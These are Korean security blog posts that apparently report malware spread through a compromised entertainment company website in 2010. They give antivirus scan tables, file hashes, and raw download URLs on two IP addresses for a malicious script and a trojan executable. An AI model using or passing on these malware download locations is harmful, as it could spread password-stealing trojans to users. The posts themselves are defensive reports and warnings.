MD5...: e5eb7e0a754c1316b7ee897caba4d391
SHA1..: 1b73e8fb7310665613b6ce913ab5afb60bf5e983
SHA256: ed4989eda720d6fef0536965de85aa27498773f7c3f5827f13583c64e987c868
검사 파일: x5.exe 전송 시각: 2010.07.08 04:34:50 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.08 Trojan-Downloader.Win32.Geral!IK
AhnLab-V3 2010.07.08.00 2010.07.07 Packed/Upack
AntiVir 8.2.4.10 2010.07.07 TR/Crypt.XDR.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.08 W32/Virut.AI!Generic
Avast 4.8.1351.0 2010.07.07 Win32:Driller
Avast5 5.0.332.0 2010.07.07 Win32:Driller
AVG 9.0.0.836 2010.07.08 -
BitDefender 7.2 2010.07.08 Gen:Trojan.Heur.ciGeI11CMZh
CAT-QuickHeal 11.00 2010.07.08 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5354 2010.07.08 Heur.Packed.Unknown
DrWeb 5.0.2.03300 2010.07.08 Trojan.NtRootKit.9259
eSafe 7.0.17.0 2010.07.07 -
eTrust-Vet 36.1.7691 2010.07.07 -
F-Prot 4.6.1.107 2010.07.07 W32/Virut.AI!Generic
F-Secure 9.0.15370.0 2010.07.08 Gen:Trojan.Heur.ciGeI11CMZh
Fortinet 4.1.133.0 2010.07.07 -
GData 21 2010.07.08 Gen:Trojan.Heur.ciGeI11CMZh
Ikarus T3.1.1.84.0 2010.07.08 Trojan-Downloader.Win32.Geral
Jiangmin 13.0.900 2010.07.07 TrojanDownloader.Geral.byt
Kaspersky 7.0.0.125 2010.07.08 Trojan-Downloader.Win32.Geral.vng
McAfee 5.400.0.1158 2010.07.08 Artemis!3D42ECA5339A
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.Win32.Packed.A
Microsoft 1.5902 2010.07.08 TrojanDownloader:Win32/Dogrobot.D
NOD32 5260 2010.07.07 a variant of Win32/AntiAV.NGR
Norman 6.05.11 2010.07.07 W32/Suspicious_U.gen
nProtect 2010-07-07.02 2010.07.07 -
Panda 10.0.2.7 2010.07.07 W32/Spamta.gen.worm
PCTools 7.0.3.5 2010.07.07 -
Prevx 3.0 2010.07.08 -
Rising 22.55.02.04 2010.07.07 Trojan.Win32.Generic.521C8921
Sophos 4.54.0 2010.07.08 Mal/EncPk-BW
Sunbelt 6557 2010.07.07 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.08 Suspicious.Cloud
TheHacker 6.5.2.1.309 2010.07.07 W32/Behav-Heuristic-060
TrendMicro 9.120.0.1004 2010.07.08 Cryp_Xed-12
TrendMicro-HouseCall 9.120.0.1004 2010.07.08 Cryp_Xed-12
VBA32 3.12.12.6 2010.07.07 -
ViRobot 2010.6.29.3912 2010.07.08 -
VirusBuster 5.0.27.0 2010.07.07 -
 
추가 정보
File size: 39848 bytes
MD5...: 3d42eca5339a073c9e731cb18260407b
SHA1..: 862f330a2299b7472376e990b7ef7f5cad46eaa1
SHA256: 6932cc1719b7c871feda078417349b39514a680dabe8409ddf59f07bac2e135c



신고 : 이스트 소프트 , 안철수 연구소

[ 이전글 ]

2010/07/07 - [security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

2010/07/05 - [security/악성코드 유포] - 지난주 종합 유포지 5곳 !!

댓글을 달아 주세요

posted by Kwan's 2010. 5. 12. 18:20
3주전 발견했던 CJ 엔터 테인먼트가 현재 까지도 악성코드를 가지고 있어서 이렇게 글을 올린다.
프로그램으로 본 결과 악성 코드인 lib.asp 를 삽입되어 있는 모습을 이와 같이 볼수있다.



JS 파일 안에 lib.asp 라는 파일을 확인을 할 수가 있을것이다. 이것은 역시 익스플로러로 들어갈시에 time out 이라는 문구를 보내며 위장하고 있는 사실을 볼 수 가 있다.
이 파일을 다시 복호화 과청을 걸친다면 최종 파일인 exe 가 볼수있다.
이글을 쓰는 지금 이시각도 유포중에 있으며 이 사이트를 매우 조심해야 할 필요가있다.

현재 최종파일도 받는 서버가 살아 있으므로 이 곳을 매우 조심해야한다.

lib.asp : http://61.100.7.171/cxx/lib.asp0
최종파일 : http://61.100.1.93/cxx/isa.exe0

현재도 다운을 받을 수 있으며 마지막으로 이 사이트에 대해서는 조심하자!

검사 파일: lib.asp 전송 시각: 2010.05.10 00:38:59 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.05.09.00 2010.05.08 JS/Downloader
AntiVir 8.2.1.236 2010.05.09 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.09 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.09 Script/Exploit
BitDefender 7.2 2010.05.10 Trojan.Script.407264
CAT-QuickHeal 10.00 2010.05.08 -
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 -
DrWeb 5.0.2.03300 2010.05.10 -
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet None 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.10 Trojan.Script.407264
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.05.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.05.09 -
Kaspersky 7.0.0.125 2010.05.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.09 -
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.09 -
NOD32 5099 2010.05.10 -
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Script.407264
Panda 10.0.2.7 2010.05.09 -
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 -
Rising 22.46.06.04 2010.05.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.09 JS/Agent-MZX
Sunbelt 6283 2010.05.10 -
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.09 -
TrendMicro 9.120.0.1004 2010.05.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 -
ViRobot 2010.5.8.2306 2010.05.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 5851 bytes
MD5   : 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1  : e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.05.10 00:46:48 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Pincav.54784.U
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 Trojan/Win32.Pincav.gen
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.09 Win32:Malware-gen
AVG 9.0.0.787 2010.05.09 Generic17.BKEJ
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 Trojan.Pincav.ywu
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.24430
eSafe 7.0.17.0 2010.05.09 Win32.PWS.Mmorpg
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 W32/Pincav.YWU!tr
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.ywu
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!oq
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 Win32/PSW.Gamania.NCP
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Generic Trojan
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.5202C6D7
Sophos 4.53.0 2010.05.09 Troj/Dload-HL
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 Trojan/Pincav.ywu
TrendMicro 9.120.0.1004 2010.05.09 TSPY_MAGANIA.KI
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 TSPY_MAGANIA.KI
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.54784.C
VirusBuster 5.0.27.0 2010.05.09 Trojan.PWS.Gamania.BBV
 
추가 정보
File size: 54784 bytes
MD5...: a19b540af7132a86e866be1152256f07
SHA1..: 77715cc29b8911598f5f43bb0b17687267ea75f5
SHA256: 1d109b0ebfebc3d3c960bb7e4ef2917d64c4fef515ab031f1f15d522f0aa7fde

box.exe ~> V3 : Win-Trojan/Magania.53248.AA(추가 : 2010.05.07.07)
isa.exe ~> V3 : Win-Trojan/Pincav.54784.U(추가 : 2010.05.01.00)

이와 같이 현재는 대부분의 신고로 모두 백신이 잡는다는 것을 볼수있다.
이런 사이트는 안전한 상태가 아니면 피하는것이 좋다고 볼수있다.
호기심에 실행시켜서 얻는 불이익은 모두 실행시킨분의 책임입니다.


댓글을 달아 주세요